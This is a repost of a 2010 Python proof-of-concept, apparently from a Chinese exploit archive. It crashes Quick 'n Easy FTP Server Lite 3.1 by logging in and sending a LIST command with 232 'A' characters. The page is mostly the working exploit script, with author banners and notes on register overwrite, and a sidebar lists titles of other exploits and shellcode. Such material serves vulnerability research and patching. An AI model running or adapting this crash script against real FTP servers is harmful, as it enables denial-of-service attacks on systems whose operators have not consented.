首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Quick 'n Easy FTP Server Lite Version 3.1
来源:sumit.iips@gmail.com 作者:b0nd 发布时间:2010-06-04  

#!/usr/bin/python

print "\n############################################################"
print "##   Team Hackers Garage   ##"
print "## Quick 'n Easy FTP Server Lite Version 3.1 ##"
print "##         Crash PoC   ##"
print "##   Sumit Sharma (aka b0nd)  ##"
print "##    sumit.iips@gmail.com   ##"
print "##       ##"
print "##     Special Thanks to: Double_Zero  ##"
print "## (http://www.exploit-db.com/author/DouBle_Zer0)  ##"
print "##      &    ##"
print "##  Peter Van (CORELAN TEAM)  ##"
print "##       ##"
print "############################################################"

# Summary: The "LIST" command in Version 3.1 of Quick 'n Easy FTP Server Lite is vulnerable
# Tested on: Windows XP SP2
# ftp> ls AAAA... 232 A's...AAA?
# Server Crash!
# Only EBX gets overwritten at the time of crash with the string following first 232 A's (in case using longer string).
# No SEH overwrite
# No EIP overwrite


from socket import *

host = "172.12.128.4"  # Virtual Windows XP SP2
port = 21
user = "test"   # "upload" and "download" access
password = "test"


s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
print s.recv(1024)

s.send("user %s\r\n" % (user))
print s.recv(1024)

s.send("pass %s\r\n" % (password))
print s.recv(1024)

buffer = "LIST "
buffer += "A" * 232
buffer += "?"
buffer += "\r\n"

s.send(buffer)
print s.recv(1024)
s.close()
print "---->>> Server Crash!!!"


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·x86 linux hard / unclean reboo
·33 bytes unlink "/etc/shadow"
·x86 linux hard / unclean reboo
·58 bytes sys_setdomainname ("t
·Solaris/x86 - SystemV killall
·linux/x86 "low" frequency syst
·linux/x86 whoami shellcode 39
·linux/x86 "high" frequency sys
·QtWeb 3.3 Remote DoS / Crash E
·linux/x86 sys_sync shellcode 6
·39 bytes sys_setuid(0) & sys_s
·OS X EvoCam Web Server Buffer
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved